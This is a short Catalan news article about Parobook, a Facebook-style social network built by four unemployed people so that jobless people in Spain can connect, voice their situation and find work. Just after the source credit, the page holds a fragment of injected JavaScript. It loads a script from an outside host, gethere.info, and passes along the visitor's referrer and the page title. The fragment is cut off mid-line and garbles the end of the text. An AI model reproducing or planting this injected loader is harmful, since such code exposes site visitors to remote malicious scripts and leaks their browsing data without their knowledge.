Parobook, la xarxa social per als aturats

Una xarxa social per posar en contacte persones aturades, compartir i denunciar la seva situació i, si és possible, trobar feina. Això és Parobook, un nou portal inspirat en Facebook i creat per quatre ciutadans que són a l’atur, Carlos Ayuso, Íñigo González, José González i Antuan Sarmiento Ramírez.

L’objectiu principal de la xarxa social és que els 4.696.600 aturats que hi ha actualment a Espanya, segons les dades fetes públiques avui mateix per l’Instituto Nacional de Estadística, puguin posar-se en contacte i actuar conjuntament per fer sentir sentir la seva veu amb més força, amb l’esperança que això serveixi per millorar la seva situació econòmica i laboral.

Però més enllà d’això, Parobook també pot ajudar a trobar feina a les persones que no en tenen, i de fet ja hi ha algunes empreses que s’han registrat a la xarxa per oferir llocs de treball.

Amb un disseny pràcticament calcat al del Facebook, però amb el color vermell substituint el blau, Parobook destaca també per la seva transparència en matèria de privacitat, i exposa de manera detallada el control que mantenen els usuaris sobre la informació que hi publiquen.

Font: ara.cats.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

A Manlleu
Fem Xarxa